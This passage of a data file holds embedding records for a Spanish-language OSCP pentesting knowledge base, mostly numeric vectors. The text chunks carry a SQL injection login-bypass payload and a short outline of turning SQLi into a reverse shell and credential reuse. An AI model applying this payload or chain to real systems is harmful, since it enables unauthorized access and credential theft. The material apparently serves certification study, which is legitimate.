-0.09868, -0.0128, 0.05899, -0.02604, 0.04473, 0.06604, -0.04513, -0.0507, 0.06393, -0.00448, -0.00932, -0.08874, 0.09943, -0.02728, -0.07579, 0.00441, -0.00639, -0.08016, -0.08425, 0.06754, -0.0184, -0.02344, -0.06395, 0.02162, -0.07413, 0.00199, -0.02975, -0.07084, -0.08127, -0.08431, -0.02886, -0.02217, -0.12626, 0.00273, -0.12111, -0.01529, -0.0414, 0.09635, 0.05309, -0.06888, -0.01213, -0.01569, 0.044, 0.03639, 0.00908, -0.02999, -0.02163, -0.0395, 0.01135, -0.1106, 0.0356, -0.05839, 0.03708, 0.08056, 0.05123, -0.05293, 0.04747, 0.08389, -0.02328, -0.02312, -0.0599, 0.00568, -0.03574, -0.02866, -0.02877, 0.08414, -0.12205, -0.03051, -0.0241, -0.01954, -0.03772, 0.09723, -0.03839, -0.01017, -0.12958, 0.05466, 0.03016, -0.03816, -0.0454, 0.00585, -0.01203, 0.04883, -0.00544, 0.03454, 0.01438, -0.03843, 0.1118, 0.00299, -0.00737, -0.08176, -0.05785, -0.02182, 0.01155, 0.00055, -0.11244, 0.04254, 0.05297, -0.03104, 0.05498, 0.05486, 0.10379, 0.04166, -0.02821, 0.03534, -0.03627, 0.01404, -0.01233, -0.00328, -0.00674, -0.08531, -0.02207, -0.00821, -0.06324, -0.12249, -0.0653, -0.02306, -0.03117, 0.0154, 0.01717, -0.01113, -0.0152, 0.01802, 0.0544, 0.01992, 0.12689, -0.05169, -0.11664, -0.01836, 0.01144, 0.01916, -0.00903, -0.01673, -0.02922, 0.0508, -0.01482, 0.04565, -0.04855, 0.0492, -0.01091, -0.06082, -0.00125, 0.04295, 0.031, -0.02874, 0.02687, 0.05712, -0.01383, -0.00821, 0.02722, 0.06225, -0.06705, -0.01486, -0.01397, 0.02897, 0.00183, -0.03153, -0.03803, 0.0016, -0.09362, -0.00139, -0.03311, -0.00268, 0.01251, 0.02165, 0.01623, -0.0169, 0.06429, 0.00517]} +{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SQL injection\n\n> Aprende **manual primero** (en Burp Repeater e Intruder). `sqlmap` a veces miente β€” y en el examen estΓ‘ limitado (Reglas de herramientas). Vector de Hacking web.", "indexar": "quΓ© herramienta debo practicar primero para ataques SQL injection?", "v": [-0.06218, 0.01632, -0.23663, -0.19069, 0.02247, -0.24456, -0.05049, -0.08868, 0.06237, 0.09225, -0.01689, 0.00297, 0.01037, -0.14194, 0.02618, 0.00243, 0.06182, -0.13057, -0.02117, 0.01043, 0.00183, -0.02567, 0.003, 0.02765, -0.0896, 0.0247, -0.06496, 0.14422, -0.11495, -0.04967, -0.1327, -0.00503, 0.02301, -0.00064, -0.04078, -0.0272, -0.03864, 0.05301, 0.07674, 0.05368, -0.06815, -0.02381, -0.21748, -0.03368, 0.11808, 0.06758, 0.09751, 0.01063, -0.01631, 0.00678, 0.0072, -0.03922, -0.08324, -0.15823, -0.05514, -0.12616, 0.0692, -0.1213, 0.04299, -0.06619, -0.12946, 0.02432, 0.01686, -0.01108, 0.01909, -0.00688, 0.07326, -0.07241, -0.00709, 0.14847, -0.05832, -0.0339, -0.05944, -0.06293, -0.01842, -0.03866, 0.1805, 0.09047, 0.04408, -0.02628, -0.12903, -0.03693, -0.11192, 0.02571, -0.06665, -0.01507, 0.09464, -0.00428, 0.02675, -0.01032, 0.00806, -0.01015, -0.04804, -0.02016, 0.00937, -0.03675, 0.0126, -0.10794, -0.06677, -0.02208, 0.06707, -0.04652, -0.09913, 0.1165, 0.05956, 0.01789, -0.02085, -0.04781, -0.05689, -0.08828, 0.03179, -0.02544, -0.03973, -0.03308, 0.04535, 0.06073, 0.02534, 0.0063, 0.00272, 0.01087, -0.07469, 0.03437, -0.07728, 0.00072, -0.04472, -0.04739, -0.03589, 0.02038, -0.0887, 0.01269, 0.00375, 0.00201, -0.01445, 0.07281, -0.09244, 0.08527, 0.04478, -0.13553, -0.06209, -0.05075, 0.01969, 0.01803, -0.03655, -0.05799, -0.00376, 0.05004, 0.03406, 0.00144, -0.07243, 0.02353, 0.03853, -0.06572, 0.04357, 0.03385, -0.04862, -0.0287, 0.03459, -0.03261, -0.08731, 0.07181, 0.01195, 0.00281, 0.05447, 0.0393, -0.0219, -0.03826, 0.01569, -0.01641, 0.0671, 0.09869, 0.05029, 0.07076, 0.10042, -0.03132, 0.00951, 0.00301, -0.0567, -0.05492, 0.02683, -0.08789, 0.0103, -0.01161, -0.09157, -0.01317, 0.05583, -0.06953, 0.01088, 0.0406, 0.05527, 0.06293, -0.0126, -0.03023, 0.00682, -0.05535, 0.08324, -0.02761, -0.03418, -0.05804, -0.00755, -0.0219, -0.03497, -0.04486, -0.07327, -0.05529, 0.0365, 0.07555, -0.04538, -0.03761, -0.04821, 0.02125, 0.02475, -0.0088, 0.01324, 0.01125, 0.00598, -0.04837, -0.02399, 0.02544, 0.00689, -0.01632, 0.05631, -0.00927, 0.05425, -0.04705, -0.03672, -0.02887, -0.03453, -0.08953, 0.03969, 0.06434, 0.04502, -0.03714, -0.05597, 0.00307, 0.03008, -0.02337, 0.06019, -0.00179, -0.04291, 0.0118, 0.0135, 0.0402, 0.00518, 0.00766, -0.03192, -0.02939, -0.03138, 0.00406, -0.04023, -0.059, -0.0003, 0.01164, 0.07791, -0.01457, 0.00715, -0.01251]} +{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SQL injection\n\n> Aprende **manual primero** (en Burp Repeater e Intruder). `sqlmap` a veces miente β€” y en el examen estΓ‘ limitado (Reglas de herramientas). Vector de Hacking web.", "indexar": "cΓ³mo puedo probar si una base de datos es vulnerable sin usar scripts automatizados?", "v": [0.02577, 0.1036, -0.19018, -0.14929, -0.01641, -0.10551, -0.0961, -0.09998, -0.08964, -0.04807, -0.1066, -0.16395, -0.06431, -0.04257, -0.05171, -0.05537, 0.04148, -0.12142, -0.01418, 0.01337, 0.05607, -0.10853, -0.09763, -0.04007, -0.07357, 0.01951, 0.05156, -0.00692, -0.17503, 0.0164, -0.11703, 0.05887, 0.06542, 0.01961, -0.06086, 0.01505, -0.06275, 0.04631, 0.10017, 0.09121, 0.04468, -0.03866, -0.07976, 0.07965, 0.0623, -0.01888, -0.03308, -0.05489, 0.00362, -0.05253, -0.02678, -0.02972, -0.15943, -0.04046, -0.05011, -0.05805, 0.09482, -0.1347, 0.0556, 0.06148, -0.02797, 0.00121, 0.10559, 0.08698, 0.01148, -0.04838, 0.1032, -0.01951, -0.13726, 0.10954, 0.07306, 0.07295, -0.09459, -0.02622, 0.09597, -0.04099, -0.00148, -0.04794, -0.02125, -0.0119, -0.05191, -0.02311, -0.02099, 0.03894, -0.07326, -0.13614, 0.01977, 0.00795, -0.03668, -0.10845, 0.19433, 0.01264, -0.01439, -0.01557, 0.06957, -0.01825, 0.05425, -0.06224, 0.0166, 0.01053, -0.02337, -0.05327, -0.01756, 0.15483, 0.05109, 0.04405, 0.06228, 0.01328, -0.00454, -0.15487, -0.05598, 0.00407, -0.10187, 0.02073, 0.01147, 0.01386, -0.01325, 0.00804, 0.01233, -0.05243, 0.00838, -0.01861, -0.05568, -0.05038, 0.0379, -0.01996, 0.03865, 0.05607, -0.05353, 0.06257, -0.09541, 0.02902, -0.13495, -0.03983, 0.03693, 0.10785, 0.02002, -0.03782, -0.04955, -0.0445, 0.0066, 0.09921, 0.00627, 0.0558, 0.07986, -0.03871, 0.00079, 0.01291, -0.07318, -0.01482, -0.01589, 0.00625, 0.01497, 0.0921, -0.07946, -0.06267, 0.06418, -0.08117, -0.04476, 0.0069, -0.02343, 0.01144, -0.09597, 0.07915, 0.09714, -0.0398, 0.03241, 0.00964, 0.04606, 0.05599, 0.01996, 0.11884, 0.08832, -0.03146, 0.04189, -0.07621, -0.06859, -0.03445, -0.11821, -0.00981, 0.04231, -0.04962, -0.00442, -0.01624, 0.04956, 0.00679, 0.06758, -0.0547, 0.03987, 0.05073, -0.02789, 0.08621, 0.02169, 0.00795, 0.06126, -0.03522, -0.0273, 0.00824, -0.02486, -0.05379, -0.07331, 0.06965, 0.01253, -0.04496, 0.04059, 0.03457, -0.02296, -0.03843, -0.0012, -0.02701, 0.02353, -0.02931, 0.07566, -0.0321, -0.04576, -0.02545, -0.01921, 0.01513, 0.00066, -0.02696, -0.02316, 0.00962, 0.05812, -0.01072, 0.0087, -0.00498, 0.06486, 0.01147, 0.0121, 0.00281, 0.01549, 0.00897, -0.04969, -0.00231, 0.04236, -0.02998, -0.03684, -0.01372, -0.07187, -0.08391, 0.00448, 0.10558, -0.02245, -0.05734, -0.00469, -0.04957, -0.0796, -0.00855, -0.00094, -0.0547, 0.00193, -0.02976, 0.06616, -0.04906, -0.02859, 0.01296]} +{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de login\n```\n' OR '1'='1'-- - (con espacio - doble guion - espacio)\n```", "indexar": "ΒΏCΓ³mo puedo realizar un bypass de login usando SQL?", "v": [-0.17478, 0.09533, -0.15938, -0.05883, -0.0623, -0.25606, -0.12926, -0.15117, -0.07783, 0.03593, -0.15605, -0.11677, 0.05949, -0.00495, -0.08712, -0.05829, -0.01603, -0.05104, -0.10682, -0.00404, 0.08139, -0.07464, 0.00968, 0.04712, 0.04229, 0.04504, 0.10604, 0.02303, -0.05277, -0.14255, -0.09748, -0.03072, 0.00965, 0.07603, 0.01572, 0.05711, 0.04998, 0.14367, 0.01262, -0.04252, -0.01746, -0.03495, -0.13163, 0.03887, 0.10575, -0.05074, 0.10603, -0.03764, -0.07001, -0.04951, -0.02183, -0.0105, -0.18522, -0.05126, -0.02311, -0.02554, 0.0525, -0.0553, 0.03644, 0.04728, -0.09602, -0.03186, 0.05332, 0.12593, -0.01886, -0.09229, 0.06758, -0.03094, -0.02145, 0.2123, -0.05633, -0.03133, -0.02659, -0.02342, 0.03313, -0.02076, 0.10531, 0.02023, 0.12752, -0.01138, -0.05849, -0.01701, -0.08575, 0.03265, -0.04783, 0.04995, 0.03696, 0.07004, 0.04488, -0.00299, 0.04125, -0.04571, 0.08813, -0.03536, -0.01578, -0.02747, -0.0152, -0.038, -0.07208, -0.04429, 0.01644, 0.02123, -0.03007, 0.20467, 0.00372, 0.0117, 0.09426, -0.05053, -0.0714, -0.07242, 0.0229, -0.01205, -0.09165, -0.07541, 0.04329, 0.09935, -0.00648, 0.00167, -0.05032, 0.10356, -0.04802, 0.02004, 0.0009, -0.01516, 0.05238, -0.05065, 0.08511, 0.09745, -0.08506, 0.04366, -0.03183, 0.03639, -0.03176, -0.06029, -0.03455, 0.04546, 0.05847, -0.09268, -0.06758, -0.02048, -0.00883, -0.04623, -0.02857, 0.01035, 0.01896, 0.01699, 0.00674, -0.00194, -0.10788, -0.08441, 0.05998, -0.0656, -0.00737, 0.01906, -0.02265, -0.0765, 0.07528, -0.04591, -0.02799, 0.06093, -0.03491, 0.06347, -0.06312, -0.0493, -0.02567, -0.04764, 0.01335, -0.06763, 0.00679, -0.02237, 0.09093, 0.04863, 0.09718, -0.09821, 0.05842, 0.03418, -0.01583, -0.03586, 0.05026, -0.01309, 0.05481, 0.00379, -0.00737, -0.03254, 0.03804, -8e-05, 0.07939, 0.01358, 0.01064, 0.03266, -0.00274, 0.03786, 0.06677, -0.03593, 0.02616, 0.01054, -0.02553, -0.0454, -0.00112, -0.05225, 0.02725, -0.01834, -0.02037, -0.04745, 0.02569, -0.02491, -0.06536, 0.04462, 0.01332, -0.03968, 0.02804, -0.00764, 0.00805, -0.02562, 0.03594, 0.02138, -0.0577, 0.03857, -0.01573, -0.04128, -0.01051, 0.04061, 0.05815, 0.03345, -0.01164, 0.02914, -0.05211, -0.05074, -0.01792, 0.04163, 0.023, 0.01674, 0.00312, 0.06369, 0.06028, -0.0124, -0.0472, -0.00416, -0.01931, 0.01029, 0.07892, 0.03364, -0.00651, 0.05163, -0.06169, 0.02725, -0.0554, 0.00779, -0.04227, -0.01519, 0.00828, -0.04652, -0.03024, 0.05389, 0.00725, 0.01334]} +{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de login\n```\n' OR '1'='1'-- - (con espacio - doble guion - espacio)\n```", "indexar": "Con quΓ© tΓ©cnica puedo evitar el inicio de sesiΓ³n forzando una condiciΓ³n verdadera?", "v": [-0.16829, 0.14758, -0.25278, -0.00268, 0.01485, -0.0617, -0.00358, -0.0512, -0.05063, -0.06174, -0.13098, 0.06873, -0.04777, 0.01446, 0.08395, 0.12933, 0.12302, -0.00763, 0.05, -0.10175, 0.0049, -0.17157, 0.00917, -0.10141, 0.1168, -0.08364, -0.02428, -0.01091, -0.02606, -0.14917, -0.00349, 0.13491, 0.19541, -0.04619, 0.02647, 0.04839, -0.01587, 0.14628, 0.04701, 0.00385, -0.10607, 0.08557, -0.00265, 0.0279, 0.11836, -0.08008, 0.0274, 0.04366, -0.07307, -0.00148, 0.04708, 0.05234, -0.0162, -0.08615, -0.11213, -0.01491, 0.10703, 0.00818, -0.02151, -0.00287, 0.00117, 0.03233, -0.02119, 0.07038, 0.08763, 0.01959, 0.04236, -0.06107, 0.0466, 0.04585, -0.15779, -0.0911, -0.04941, -0.08222, 0.03406, -0.06507, -0.00276, -0.01577, -0.04167, -0.0471, -0.0461, 0.08206, -0.05127, 0.01814, -0.04694, -0.0978, 0.04958, 0.01963, -0.02608, -0.15555, 0.03878, 0.03309, 0.05276, -0.14431, 0.02636, 0.03696, -0.05608, 0.08639, -0.01273, 0.03483, 0.08914, -0.0106, -0.02795, 0.01509, 0.06295, -0.01704, -0.0346, -0.05033, -0.02827, -0.05754, -0.10299, 0.0284, -0.10853, 0.01111, -0.01897, -0.00036, -0.09422, -0.07313, -0.04025, 0.01394, -0.07244, -0.01091, -0.01415, -0.02853, -0.02539, 0.00896, 0.01013, 0.03162, -0.01621, -0.00789, -0.00489, -0.00837, -0.00621, -0.03128, -0.0479, -0.02357, 0.07332, -0.07938, -0.08001, -0.13665, 0.001, 0.10571, -0.0623, -0.07686, 0.03714, -0.01683, 0.013, -0.09079, -0.11331, -0.03428, 0.07949, -0.02107, 0.08943, 0.08351, -0.04785, 0.03825, 0.08142, -0.05465, 0.07881, 0.03158, -0.0032, 0.02953, -0.06648, -0.07606, -0.04558, -0.04907, -0.06978, -0.01929, -0.07284, -0.01582, -0.0687, -0.01193, 0.03123, -0.02706, 0.01898, 0.00125, -0.06635, -0.00324, -0.00708, -0.10177, -0.02122, -0.00736, 0.00314, -0.02795, 0.00298, 0.03529, -0.12657, -0.01924, 0.06314, 0.00741, -0.00056, 0.05964, -0.0496, -0.03989, -0.02859, -0.01744, 0.00372, -0.01805, 0.00141, 0.00814, -0.04386, -0.02392, 0.0141, 0.03084, 0.07602, -0.00734, -0.04742, -0.02561, -0.04318, -0.02262, 0.0572, -0.04385, 0.05509, -0.03466, 0.0028, -0.03366, -0.02429, -0.02801, 0.01547, -0.03807, 0.02694, 0.06506, 0.0639, 0.04573, 0.00825, -0.0195, 0.05032, -0.02443, -0.00532, 0.05185, 0.01736, -0.00104, 0.02138, 0.04348, 0.04349, 0.00312, 0.0271, -0.0241, -0.033, 0.02773, 0.04063, 0.07, -0.02222, -0.06378, -0.0048, -0.02138, -0.08877, -0.01917, -0.01785, -0.03765, 0.02669, 0.05701, 0.08518, -0.04983, 0.00608, -0.0869]} +{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De SQLi a shell\n- MSSQL: `xp_cmdshell` β†’ RCE β†’ Reverse shell.\n- Dump de tablas β†’ credenciales β†’ reutilizaciΓ³n en otros servicios (Pass-the-Hash, RDP).\n- Lectura de ficheros (`LOAD_FILE`) β†’ puede encadenar con LFI a RCE.", "indexar": "que programa sirve para convertir exploits de SQLi a Reverse Shell?", "v": [-0.07814, -0.13298, -0.17979, -0.174, -0.01797, -0.26473, -0.0461, -0.17532, 0.13683, -0.00365, -0.12806, -0.11175, 0.03414, -0.13467, -0.00124, -0.01099, -0.04204, -0.11909, 0.00251, 0.07467, 0.09592, -0.03156, 0.01463, -0.09748, -0.02118, 0.09581, 0.02448, 0.01027, 0.04121, -0.07786, -0.07862, -0.04522, -0.0162, -0.05745, 0.0265, 0.00353, -0.00963, -0.00646, 0.05001, -0.04528, 0.07629, -0.10624, -0.22527, 0.06892, 0.14747, -0.01862, 0.06858, 0.00888, -0.00581, 0.00955, -0.00489, 0.03258, -0.23225, -0.01638, 0.06008, -0.02175, -0.02011, -0.04022, -0.06263, 0.10174, -0.07644, -0.07016, 0.06384, -0.06733, 0.05694, -0.04847, -0.01075, -0.0453, -0.0941, 0.09338, -0.08886, -0.01537, 0.02874, -0.02381, -0.07836, -0.03916, 0.06953, 0.01478, -0.01973, -0.03405, -0.15791, -0.06366, -0.08602, 0.08318, 0.02011, 0.02309, 0.04992, -0.01437, 0.06072, -0.02513, -0.04721, -0.00014, 0.03936, 0.05011, 0.06795, -0.06317, 0.14043, 0.01894, -0.02352, 0.09049, 0.0013, -0.0793, -0.0351, 0.13458, -0.02387, 0.09258, 0.05331, -0.05116, -0.04039, 0.05568, 0.07054, -0.05247, -0.04683, 0.02418, 0.0226, 0.09176, -0.03639, -0.03147, -0.01411, 0.00329, -0.09877, -0.03471, -0.03074, 0.06852, 0.02324, 0.00856, -0.03841, 0.07487, -0.01823, 0.02125, -0.03868, 0.06055, -0.02367, 0.01289, -0.09628, -0.0472, 0.1039, -0.03609, 0.01309, -0.10226, 0.01224, 0.0976, -0.00449, 0.02527, -0.008, -0.02435, 0.06455, -0.03318, -0.0303, -0.04203, 0.01772, -0.02216, -0.01195, 0.05946, -0.07185, -0.07702, 0.05602, -0.01747, -0.06931, 0.06578, -0.00756, -0.04522, 0.02024, -0.0371, 0.04041, -0.05713, -0.00639, -0.01967, 0.08109, 0.08031, -0.01694, 0.04506, 0.11736, -0.08437, 0.01013, 0.01652, -0.04725, -0.04582, 0.05462, -0.04276, -0.03716, 0.01784, 0.05188, 9e-05, -0.02127, 0.00735, 0.00613, 0.02384, -0.02711, -0.07982, 0.03616, -0.00422, 0.04443, -0.03241, -0.00685, 0.03044, -0.06579, -0.02524, 0.04475, -0.08739, -0.02311, -0.01949, -0.06938, -0.04118, 0.04279, 0.07152, -0.04378, 0.01158, 0.01056, -0.0027, -0.0312, -0.00657, 0.01663, 0.04356, -0.02422, -0.04589, -0.00583, 0.06249, 0.01441, 0.03979, -0.0147, -0.0147, 0.00285, 0.00013, -0.02693, -0.06572, -0.0059, -0.02027, -0.00054, 0.00967, -0.00637, -0.03992, 0.02763, 0.00095, -0.03293, -0.01667, -0.0079, -0.00739, -0.00344, -0.07068, -0.00464, 0.07652, -0.00966, -0.02347, 0.01083, 0.03823, -0.05685, 0.02153, 0.01939, -0.02594, -0.04769, -0.00099, -0.01047, -0.03866, 0.03604, -0.0017]} +{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De SQLi a shell\n- MSSQL: `xp_cmdshell` β†’ RCE β†’ Reverse shell.\n- Dump de tablas β†’ credenciales β†’ reutilizaciΓ³n en otros servicios (Pass-the-Hash, RDP).\n- Lectura de ficheros (`LOAD_FILE`) β†’ puede encadenar con LFI a RCE.", "indexar": "con que herramienta puedo escupir credenciales de una base de datos MSSQL?", "v": [-0.17201, -0.0939, -0.04951, -0.15214, -0.0254, -0.20573, -0.15599, -0.10688, -0.06796, -0.02246, -0.06279, 0.04317, 0.08455, -0.16099, 0.03945, 0.00317, 0.06627, -0.10675, -0.06312, 0.02389, 0.0892, -0.1289, -0.11067, -0.07813, -0.14923, 0.08928, -0.00479, 0.05958, -0.08857, 0.05044, -0.03626, 0.0435, -0.13871, 0.00447, -0.02058, -0.00782, -0.11737, 0.14175, -0.05038, -0.0196, -0.07256, 0.03051, -0.07735, 0.04516, 0.08669, -0.07565, -0.00838, 0.03885, -0.02003, -0.0317, -0.09412, -0.18235, -0.1854, -0.10514, -0.05535, -0.0967, 0.15903, -0.05278, 0.10199, 0.04299, -0.14977, 0.03234, -0.01751, -0.02945, -0.0234, -0.00675, 0.11572, -0.09932, -0.03831, 0.13353, -0.02864, 0.00397, 0.01256, -0.06964, -0.01211, -0.07955, 0.16252, 0.03648, 0.08309, 0.01019, -0.03647, -0.06841, -0.05759, 0.1048, 0.00819, -0.02937, 0.04652, 0.00219, -0.029, -0.00845, 0.03823, 0.13547, -0.03414, 0.03541, 0.02922, 0.00045, 0.01875, -0.09038, -0.05016, -0.00333, 0.02044, 0.02098, -0.01867, 0.10832, 0.04336, 0.06449, 0.05344, 0.03191, -0.06069, -0.00282, 0.02937, -0.02336, -0.04056, 0.01888, 0.02751, 0.06198, -0.01046, -0.00328, -0.03192, 0.02255, 0.10665, -0.0209, 0.03775, -0.02625, -0.02082, -0.0444, -0.11097, 0.08128, -0.02985, -0.01674, -0.00449, -0.02845, -0.09976, 0.01472, 0.11282, 0.04394, -0.04292, -0.11214, -0.00646, -0.04636, -0.028, 0.0209, -0.02144, -0.03563, 0.02289, -0.02623, 0.01864, 0.04136, -0.03225, -0.0763, 0.03949, 0.04093, 0.03518, 0.01402, -0.05775, 0.05289, 0.05449, 0.05192, -0.047, 0.03241, -0.01466, -0.00455, 0.02126, 0.05017, -0.00962, -0.06033, 0.09629, -0.06083, 0.03967, 0.02951, 0.01338, 0.02825, 0.0944, -0.06837, 0.05092, -0.04446, -0.07265, -0.06224, -0.04337, -0.04436, 0.04385, -0.04503, -0.00987, -0.02324, 0.03955, -0.00958, 0.00297, -0.01562, -0.02465, -0.06269, -0.03257, 0.05065, 0.07384, -0.03607, 0.03189, -0.02121, 0.04152, -0.03458, 0.0316, -0.01145, -0.09286, 0.01208, -0.0388, -0.01819, 0.01012, 0.04476, 0.00521, 0.0064, 0.01497, -0.03695, 0.00787, 0.0063, 0.02007, -0.03637, -0.03066, -0.04516, 0.02517, 0.02602, 0.01375, -0.04733, -0.0047, 0.04525, 0.0583, -0.0137, -0.03422, -0.04383, 0.0004, -0.01312, 0.0085, -0.01028, 0.04044, -0.05372, 0.02273, -0.06146, 0.04371, -0.0273, -0.03046, -0.03011, -0.0235, -0.01587, -0.01632, 0.04116, -0.02251, -0.06261, -0.01712, 0.02411, -0.04064, 0.01637, -0.04337, -0.06039, 0.00023, -0.04462, 0.07046, -0.05904, -0.00848, -0.00028]} +{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De SQLi a shell\n- MSSQL: `xp_cmdshell` β†’ RCE β†’ Reverse shell.\n- Dump de tablas β†’ credenciales β†’ reutilizaciΓ³n en otros servicios (Pass-the-Hash, RDP).\n- Lectura de ficheros (`LOAD_FILE`) β†’ puede encadenar con LFI a RCE.", "indexar": "cual es la tecnica o software para unir la lectura de ficheros con LFI y conseguir RCE?", "v": [-0.03643, -0.10498, -0.14068, -0.07334, 0.15348, -0.15127, -0.09364, 0.01866, -0.05914, -0.03477, -0.05235, -0.05976, -0.02835, -0.09182, 0.16166, 0.01696, -0.01829, -0.08862, -0.03457, -0.11598, -0.03532, -0.00271, -0.1394, -0.01677, 0.02295, -0.06616, 0.10662, -0.23522, 0.0098, -0.08401, 0.14513, 0.10042, 0.11577, 0.04176, -0.02231, 0.01399, 0.04442, 0.01892, 0.03772, 0.08248, 0.09406, 0.02894, -0.12789, 0.12872, 0.08137, -0.0873, 0.07379, 0.08649, 0.155, -0.00376, 0.093, 0.01058, 0.02609, -0.07105, -0.08225, -0.09547, 0.06821, 0.06829, -0.01737, -0.0366, -0.09749, 0.06746, 0.04352, -0.11556, 0.07519, -0.04833, 0.07749, -0.07838, -0.0184, -0.03453, -0.03494, 0.05043, -0.03525, -0.01552, -0.07978, 0.09457, -0.093, 0.00571, 0.04882, -0.06326, 0.00848, -0.02239, -0.12984, 0.01545, 0.0307, -0.0218, 0.17127, -0.06456, -0.00204, -0.02901, -0.0448, -0.00442, -0.05648, -0.01261, 0.08901, 0.02704, 0.05808, -0.01576, -0.0846, 0.03102, -0.0664, -0.06192, -0.07663, 0.0646, -0.0529, -0.07742, -0.04762, -0.01643, 0.02458, -0.01457, 0.01599, 0.09577, -0.02728, 0.04727, -0.04008, -0.07759, 0.05161, -0.07621, -0.03251, -0.15493, -0.01677, -0.0338, -0.09365, -0.04703, 0.08008, 0.03264, 0.0349, 0.10134, -0.0852, -0.00622, -0.03696, -0.01925, -0.10073, -0.0371, -0.0459, -0.00185, 0.0455, -0.051, -0.08251, 0.01811, 0.04501, 0.02902, -0.06556, 0.06704, 0.04737, -0.07716, 0.05217, -0.03212, -0.03684, -0.09186, -0.02474, 0.03104, -0.00087, 0.04139, -0.01249, 0.01604, 0.05733, -0.01475, -0.03236, -0.02763, -0.0407, 0.09333, 0.00951, -0.05669, -0.05263, -0.03654, -0.03982, -0.00863, 0.07781, 0.03736, -0.10269, -0.00096, -0.04299, -0.00915, 0.03853, -0.04169, -0.03509, 0.0122, -0.04627, -0.04144, -0.10938, -0.02933, 0.06844, 0.05382, -0.04751, -0.02916, -0.05886, -0.07357, -0.00293, -0.03885, -0.03748, 0.06798, -0.02391, -0.04338, -0.04035, -0.04391, -0.08834, -0.02164, 0.07994, -0.03761, -0.0236, 0.00349, 6e-05, -0.0111, 0.02363, 0.02683, 0.00163, 0.01274, -0.06313, -0.01341, 0.01282, -0.00895, 0.0969, -0.0272, -0.01292, -0.04274, -0.02675, 0.02966, 0.02261, -0.02342, 0.00303, -0.0215, 0.05718, -0.00139, 0.00868, -0.00874, 0.05201, 0.02632, 0.05347, 0.05308, -0.02568, -0.035, 0.04253, 0.01771, 0.00734, 0.05095, 0.01098, -0.01137, -0.01234, -0.0394, 0.01744, 0.05388, 0.00149, -0.0959, 0.02558, 0.01226, -0.09864, -0.00796, 0.01719, -0.03097, -0.04271, -0.02011, 0.00086, -0.04143, 0.03358, -0.06966]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Hacking web (metodologΓ­a)\n\n> CΓ³mo atacar una web paso a paso. En el OSCP, la web es el **foothold** mΓ‘s comΓΊn de las mΓ‘quinas standalone. Sub-Γ­ndice de EnumeraciΓ³n dentro de la MetodologΓ­a OSCP.", "indexar": "cual es un programa para hacer enumeracion de una web?", "v": [-0.14134, 0.06604, -0.03586, -0.06474, 0.07382, -0.11143, 0.03104, -0.02804, -0.12517, -0.11949, -0.11354, -0.02832, -0.03537, -0.11801, -0.01628, 0.07701, 0.12377, -0.10113, 0.14498, 0.08501, -0.05473, 0.04414, -0.05753, 0.0384, -0.10605, 0.00157, 0.00688, 0.0134, -0.03816, 0.06237, 0.03375, -0.01782, 0.06114, -0.08188, 0.02089, 0.09851, 0.14818, 0.04104, 0.03071, 0.07486, -0.05988, -0.02513, -0.09324, 0.02926, -0.02557, 0.01024, 0.0955, -0.07256, 0.06683, -0.10718, -0.03816, 0.08392, -0.01079, -0.07527, 0.07493, -0.099, 0.02547, -0.20337, -0.07443, 0.02525, 0.03287, -0.02363, 0.00529, -0.06601, -0.03006, 0.05933, -0.00335, 0.032, -0.02907, 0.03777, 0.06047, -0.03912, 0.07963, -0.05461, 0.02561, -0.02239, -0.01913, -0.03734, 0.03328, -0.04691, -0.0122, -0.02714, 0.03372, 0.10609, -0.0905, 0.0011, 0.02908, -0.00681, -0.01629, -0.04506, 0.02868, 0.12218, -0.04385, 0.05954, 0.07071, -0.13118, 0.17121, 0.03699, 0.00047, 0.04029, 0.04326, -0.10479, -0.20301, 0.12731, -0.04292, 0.09465, 0.05442, 0.04627, -0.15435, 0.04843, 0.01745, -0.02611, -0.09967, -0.02781, -0.10061, 0.00878, -0.07075, -0.00885, 0.0683, -0.09159, -0.09132, 0.06956, -0.14295, 0.02327, 0.08826, 0.07093, -0.0093, 0.13011, -0.08098, 0.02324, 0.04162, -0.01489, -0.03253, -0.08848, -0.06247, -0.08086, 0.04443, -0.02537, 0.06027, -0.02504, 0.04648, 0.01169, -0.0294, 0.07785, 0.0408, -0.06064, -0.00917, -0.03214, -0.08565, 0.03721, -0.04529, 0.08681, 0.00791, 0.05202, -0.03995, -0.03513, -0.00844, 0.00844, -0.04864, 0.00535, -0.03411, -0.00335, 0.03831, -0.07168, 0.086, -0.0067, -0.036, 0.08528, 0.03067, 0.01008, -0.0056, 0.08727, 0.01552, -0.08529, 0.00873, 0.02391, -0.0529, -0.07141, 0.02621, -0.01927, -0.07111, 0.01496, 0.09737, 0.05826, -0.02775, -0.03064, 0.00293, 0.03506, -0.08221, 0.01918, -0.03169, -0.02601, -0.06321, 0.00229, 0.06522, 0.0108, -0.00011, -0.01004, 0.05345, -0.06273, -0.04972, -0.08121, 0.02471, -0.0111, -0.01173, 0.09929, -0.01046, -0.07025, 0.05119, 0.10135, -0.00211, 0.00448, 0.01823, 0.0056, -0.01857, -0.02562, 